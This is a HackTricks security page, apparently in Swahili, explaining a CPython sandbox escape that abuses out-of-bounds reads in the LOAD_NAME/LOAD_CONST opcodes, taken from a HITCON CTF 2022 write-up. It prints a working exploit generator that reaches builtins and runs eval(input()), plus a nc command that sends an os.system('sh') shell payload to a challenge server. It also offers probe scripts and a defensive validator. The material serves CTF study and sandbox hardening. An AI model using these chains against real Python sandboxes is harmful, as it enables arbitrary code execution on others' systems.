LOAD_NAME / LOAD_CONST opcode OOB Read
Reading time: 11 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Taarifa hii ilichukuliwa kutoka kwa andiko hili.
TL;DR
Tunaweza kutumia kipengele cha OOB read katika LOAD_NAME / LOAD_CONST opcode kupata alama fulani katika kumbukumbu. Hii inamaanisha kutumia hila kama (a, b, c, ... mamia ya alama ..., __getattribute__) ikiwa [] vinginevyo [].__getattribute__(...)
kupata alama (kama jina la kazi) unayotaka.
Kisha tengeneza tu exploit yako.
Overview
Msimbo wa chanzo ni mfupi sana, unajumuisha mistari 4 tu!
source = input('>>> ')
if len(source) > 13337: exit(print(f"{'L':O<13337}NG"))
code = compile(source, '∅', 'eval').replace(co_consts=(), co_names=())
print(eval(code, {'__builtins__': {}}))1234
Unaweza kuingiza msimbo wa Python wa aina yoyote, na utaandikwa kuwa Python code object. Hata hivyo, co_consts
na co_names
za kitu hicho cha msimbo zitabadilishwa kuwa tuple tupu kabla ya kutathmini kitu hicho cha msimbo.
Hivyo katika njia hii, kila usemi unao na consts (k.m. nambari, nyuzi n.k.) au majina (k.m. mabadiliko, kazi) yanaweza kusababisha makosa ya segmentation mwishoni.
Kusoma Nje ya Mipaka
Je, makosa ya segfault yanatokea vipi?
Tuanzie na mfano rahisi, [a, b, c]
inaweza kuandikwa kuwa bytecode ifuatayo.
1 0 LOAD_NAME 0 (a)
2 LOAD_NAME 1 (b)
4 LOAD_NAME 2 (c)
6 BUILD_LIST 3
8 RETURN_VALUE12345
Lakini je, ni nini kitakachotokea ikiwa co_names
itakuwa tuple tupu? Opcode ya LOAD_NAME 2
bado inatekelezwa, na inajaribu kusoma thamani kutoka kwa anwani hiyo ya kumbukumbu ambayo awali ilipaswa kuwa. Ndio, hii ni "kipengele" cha kusoma nje ya mipaka.
Dhana kuu ya suluhisho ni rahisi. Opcode zingine katika CPython kama LOAD_NAME
na LOAD_CONST
zina udhaifu (?) kwa kusoma nje ya mipaka.
Zinapata kitu kutoka kwa index oparg
kutoka kwa tuple ya consts
au names
(hivyo ndivyo co_consts
na co_names
zinavyoitwa kwa ndani). Tunaweza kurejelea kipande kifupi kuhusu LOAD_CONST
ili kuona kile CPython inachofanya wakati inashughulikia opcode ya LOAD_CONST
.
case TARGET(LOAD_CONST): {
PREDICTED(LOAD_CONST);
PyObject *value = GETITEM(consts, oparg);
Py_INCREF(value);
PUSH(value);
FAST_DISPATCH();
}1234567
Kwa njia hii tunaweza kutumia kipengele cha OOB kupata "jina" kutoka kwa ofset ya kumbukumbu isiyo na mpangilio. Ili kuhakikisha jina lililo nayo na ofset yake, jaribu tu LOAD_NAME 0
, LOAD_NAME 1
... LOAD_NAME 99
... Na unaweza kupata kitu katika takriban oparg > 700. Unaweza pia kujaribu kutumia gdb kuangalia mpangilio wa kumbukumbu bila shaka, lakini sidhani kama itakuwa rahisi zaidi?
Generating the Exploit
Mara tu tunapopata hizo ofset muhimu za majina / consts, tuna wezaje kupata jina / const kutoka kwa ofset hiyo na kulitumie? Hapa kuna hila kwako:
Tuchukulie kwamba tunaweza kupata jina la __getattribute__
kutoka ofset 5 (LOAD_NAME 5
) na co_names=()
, kisha fanya mambo yafuatayo:
[a,b,c,d,e,__getattribute__] if [] else [
[].__getattribute__
# you can get the __getattribute__ method of list object now!
]1234
Kumbuka kwamba si lazima uiite
__getattribute__
, unaweza kuiita kwa jina fupi zaidi au la ajabu zaidi
Unaweza kuelewa sababu nyuma yake kwa kutazama bytecode yake:
0 BUILD_LIST 0
2 POP_JUMP_IF_FALSE 20
>> 4 LOAD_NAME 0 (a)
>> 6 LOAD_NAME 1 (b)
>> 8 LOAD_NAME 2 (c)
>> 10 LOAD_NAME 3 (d)
>> 12 LOAD_NAME 4 (e)
>> 14 LOAD_NAME 5 (__getattribute__)
16 BUILD_LIST 6
18 RETURN_VALUE
20 BUILD_LIST 0
>> 22 LOAD_ATTR 5 (__getattribute__)
24 BUILD_LIST 1
26 RETURN_VALUE1234567891011121314
Kumbuka kwamba LOAD_ATTR
pia inapata jina kutoka co_names
. Python inachukua majina kutoka kwa ofset sawa ikiwa jina ni sawa, hivyo __getattribute__
ya pili bado inachukuliwa kutoka ofset=5. Kwa kutumia kipengele hiki tunaweza kutumia jina lolote mara jina likiwa katika kumbukumbu karibu.
Kwa ajili ya kuzalisha nambari inapaswa kuwa rahisi:
- 0: si [[]]
- 1: si []
- 2: (si []) + (si [])
- ...
Exploit Script
Sikutumia consts kutokana na kikomo cha urefu.
Kwanza hapa kuna script ya kutusaidia kupata hizo ofset za majina.
from types import CodeType
from opcode import opmap
from sys import argv
class MockBuiltins(dict):
def __getitem__(self, k):
if type(k) == str:
return k
if __name__ == '__main__':
n = int(argv[1])
code = [
*([opmap['EXTENDED_ARG'], n // 256]
if n // 256 != 0 else []),
opmap['LOAD_NAME'], n % 256,
opmap['RETURN_VALUE'], 0
]
c = CodeType(
0, 0, 0, 0, 0, 0,
bytes(code),
(), (), (), '<sandbox>', '<eval>', 0, b'', ()
)
ret = eval(c, {'__builtins__': MockBuiltins()})
if ret:
print(f'{n}: {ret}')
# for i in $(seq 0 10000); do python find.py $i ; done1234567891011121314151617181920212223242526272829303132
Na yafuatayo ni kwa ajili ya kuzalisha exploit halisi ya Python.
import sys
import unicodedata
class Generator:
# get numner
def __call__(self, num):
if num == 0:
return '(not[[]])'
return '(' + ('(not[])+' * num)[:-1] + ')'
# get string
def __getattribute__(self, name):
try:
offset = None.__dir__().index(name)
return f'keys[{self(offset)}]'
except ValueError:
offset = None.__class__.__dir__(None.__class__).index(name)
return f'keys2[{self(offset)}]'
_ = Generator()
names = []
chr_code = 0
for x in range(4700):
while True:
chr_code += 1
char = unicodedata.normalize('NFKC', chr(chr_code))
if char.isidentifier() and char not in names:
names.append(char)
break
offsets = {
"__delitem__": 2800,
"__getattribute__": 2850,
'__dir__': 4693,
'__repr__': 2128,
}
variables = ('keys', 'keys2', 'None_', 'NoneType',
'm_repr', 'globals', 'builtins',)
for name, offset in offsets.items():
names[offset] = name
for i, var in enumerate(variables):
assert var not in offsets
names[792 + i] = var
source = f'''[
({",".join(names)}) if [] else [],
None_ := [[]].__delitem__({_(0)}),
keys := None_.__dir__(),
NoneType := None_.__getattribute__({_.__class__}),
keys2 := NoneType.__dir__(NoneType),
get := NoneType.__getattribute__,
m_repr := get(
get(get([],{_.__class__}),{_.__base__}),
{_.__subclasses__}
)()[-{_(2)}].__repr__,
globals := get(m_repr, m_repr.__dir__()[{_(6)}]),
builtins := globals[[*globals][{_(7)}]],
builtins[[*builtins][{_(19)}]](
builtins[[*builtins][{_(28)}]](), builtins
)
]'''.strip().replace('\n', '').replace(' ', '')
print(f"{len(source) = }", file=sys.stderr)
print(source)
# (python exp.py; echo '__import__("os").system("sh")'; cat -) | nc challenge.server port
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273
Inafanya mambo yafuatayo, kwa ajili ya zile nyuzi tunazozipata kutoka kwa njia ya __dir__
:
getattr = (None).__getattribute__('__class__').__getattribute__
builtins = getattr(
getattr(
getattr(
[].__getattribute__('__class__'),
'__base__'),
'__subclasses__'
)()[-2],
'__repr__').__getattribute__('__globals__')['builtins']
builtins['eval'](builtins['input']())
Maelezo ya toleo na opcodes zilizoathiriwa (Python 3.11–3.13)
- CPython bytecode opcodes bado huorodhesha katika
co_consts
naco_names
tuples kwa kutumia operandi za nambari. Ikiwa mshambuliaji anaweza kulazimisha tuples hizi kuwa tupu (au ndogo kuliko kiashiria cha juu zaidi kinachotumika na bytecode), mfasiri atasoma kumbukumbu za nje ya mipaka kwa ajili ya kiashiria hicho, na kutoa kiashiria cha PyObject kisichokuwa na mpangilio kutoka kwa kumbukumbu ya karibu. Opcodes zinazohusiana zinajumuisha angalau: LOAD_CONST consti
→ inasomaco_consts[consti]
.LOAD_NAME namei
,STORE_NAME
,DELETE_NAME
,LOAD_GLOBAL
,STORE_GLOBAL
,IMPORT_NAME
,IMPORT_FROM
,LOAD_ATTR
,STORE_ATTR
→ inasoma majina kutokaco_names[...]
(kwa 3.11+ kumbukaLOAD_ATTR
/LOAD_GLOBAL
hifadhi bendera za kiashiria katika bit ya chini; kiashiria halisi ninamei >> 1
). Tazama nyaraka za disassembler kwa maana sahihi kwa kila toleo. [Python dis docs].- Python 3.11+ ilianzisha caches za kubadilika/inline ambazo zinaongeza entries za siri za
CACHE
kati ya maagizo. Hii haibadilishi primitive ya OOB; inamaanisha tu kwamba ikiwa unaunda bytecode kwa mikono, lazima uhesabu entries hizo za cache unapojengaco_code
.
Mwanzo wa vitendo: mbinu katika ukurasa huu inaendelea kufanya kazi kwenye CPython 3.11, 3.12 na 3.13 unapoweza kudhibiti kitu cha msimbo (kwa mfano, kupitia CodeType.replace(...)
) na kupunguza co_consts
/co_names
.
Scanner ya haraka kwa viashiria vya OOB vinavyofaa (3.11+/3.12+ inayoendana)
Ikiwa unapendelea kuchunguza vitu vya kuvutia moja kwa moja kutoka kwa bytecode badala ya kutoka kwa chanzo cha kiwango cha juu, unaweza kuunda vitu vya msimbo vidogo na kulazimisha viashiria. Msaada hapa chini huingiza kiotomatiki caches za inline inapohitajika.
import dis, types
def assemble(ops):
# ops: list of (opname, arg) pairs
cache = bytes([dis.opmap.get("CACHE", 0), 0])
out = bytearray()
for op, arg in ops:
opc = dis.opmap[op]
out += bytes([opc, arg])
# Python >=3.11 inserts per-opcode inline cache entries
ncache = getattr(dis, "_inline_cache_entries", {}).get(opc, 0)
out += cache * ncache
return bytes(out)
# Reuse an existing function's code layout to simplify CodeType construction
base = (lambda: None).__code__
# Example: probe co_consts[i] with LOAD_CONST i and return it
# co_consts/co_names are intentionally empty so LOAD_* goes OOB
def probe_const(i):
code = assemble([
("RESUME", 0), # 3.11+
("LOAD_CONST", i),
("RETURN_VALUE", 0),
])
c = base.replace(co_code=code, co_consts=(), co_names=())
try:
return eval(c)
except Exception:
return None
for idx in range(0, 300):
obj = probe_const(idx)
if obj is not None:
print(idx, type(obj), repr(obj)[:80])
Notes
- Ili kuchunguza majina badala yake, badilisha
LOAD_CONST
kwaLOAD_NAME
/LOAD_GLOBAL
/LOAD_ATTR
na urekebishe matumizi yako ya stack ipasavyo. - Tumia
EXTENDED_ARG
au bytes nyingi zaarg
kufikia indexes >255 ikiwa inahitajika. Unapojenga nadis
kama ilivyo hapo juu, unadhibiti tu byte ya chini; kwa indexes kubwa, jenga bytes za raw mwenyewe au gawanya shambulio katika loads nyingi.
Minimal bytecode-only RCE pattern (co_consts OOB → builtins → eval/input)
Mara tu unapokuwa umepata index ya co_consts
inayorejelea moduli ya builtins, unaweza kujenga upya eval(input())
bila co_names
kwa kudhibiti stack:
# Build co_code that:
# 1) LOAD_CONST <builtins_idx> → push builtins module
# 2) Use stack shuffles and BUILD_TUPLE/UNPACK_EX to peel strings like 'input'/'eval'
# out of objects living nearby in memory (e.g., from method tables),
# 3) BINARY_SUBSCR to do builtins["input"] / builtins["eval"], CALL each, and RETURN_VALUE
# This pattern is the same idea as the high-level exploit above, but expressed in raw bytecode.
Hii mbinu ni muhimu katika changamoto zinazokupa udhibiti wa moja kwa moja juu ya co_code
wakati ukilazimisha co_consts=()
na co_names=()
(kwa mfano, BCTF 2024 “awpcode”). Inakwepa hila za kiwango cha chanzo na inashikilia ukubwa wa payload kuwa mdogo kwa kutumia operesheni za bytecode stack na wajenzi wa tuple.
Ukaguzi wa kinga na mipango ya kupunguza hatari kwa sandboxes
Ikiwa unandika “sandbox” ya Python inayokusanya/inafanya tathmini ya msimbo usioaminika au inashughulikia vitu vya msimbo, usitegemee CPython kuangalia mipaka ya viashiria vya tuple vinavyotumiwa na bytecode. Badala yake, thibitisha vitu vya msimbo mwenyewe kabla ya kuvitekeleza.
Practical validator (inakataza ufikiaji wa OOB kwa co_consts/co_names)
import dis
def max_name_index(code):
max_idx = -1
for ins in dis.get_instructions(code):
if ins.opname in {"LOAD_NAME","STORE_NAME","DELETE_NAME","IMPORT_NAME",
"IMPORT_FROM","STORE_ATTR","LOAD_ATTR","LOAD_GLOBAL","DELETE_GLOBAL"}:
namei = ins.arg or 0
# 3.11+: LOAD_ATTR/LOAD_GLOBAL encode flags in the low bit
if ins.opname in {"LOAD_ATTR","LOAD_GLOBAL"}:
namei >>= 1
max_idx = max(max_idx, namei)
return max_idx
def max_const_index(code):
return max([ins.arg for ins in dis.get_instructions(code)
if ins.opname == "LOAD_CONST"] + [-1])
def validate_code_object(code: type((lambda:0).__code__)):
if max_const_index(code) >= len(code.co_consts):
raise ValueError("Bytecode refers to const index beyond co_consts length")
if max_name_index(code) >= len(code.co_names):
raise ValueError("Bytecode refers to name index beyond co_names length")
# Example use in a sandbox:
# src = input(); c = compile(src, '<sandbox>', 'exec')
# c = c.replace(co_consts=(), co_names=()) # if you really need this, validate first
# validate_code_object(c)
# eval(c, {'__builtins__': {}})
Mawazo mengine ya kupunguza
- Usiruhusu
CodeType.replace(...)
isiyoaminika kwenye pembejeo zisizoaminika, au ongeza ukaguzi mkali wa muundo kwenye kitu cha msimbo kinachotokana. - Fikiria kuendesha msimbo usioaminika katika mchakato tofauti na sandboxing ya kiwango cha OS (seccomp, vitu vya kazi, kontena) badala ya kutegemea semantics za CPython.
Marejeleo
- Andiko la Splitline’s HITCON CTF 2022 “V O I D” (chanzo cha mbinu hii na mnyororo wa juu wa unyakuzi): https://blog.splitline.tw/hitcon-ctf-2022/
- Nyaraka za disassembler za Python (semantics za viashiria kwa LOAD_CONST/LOAD_NAME/nk., na 3.11+
LOAD_ATTR
/LOAD_GLOBAL
bendera za chini): https://docs.python.org/3.13/library/dis.html
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.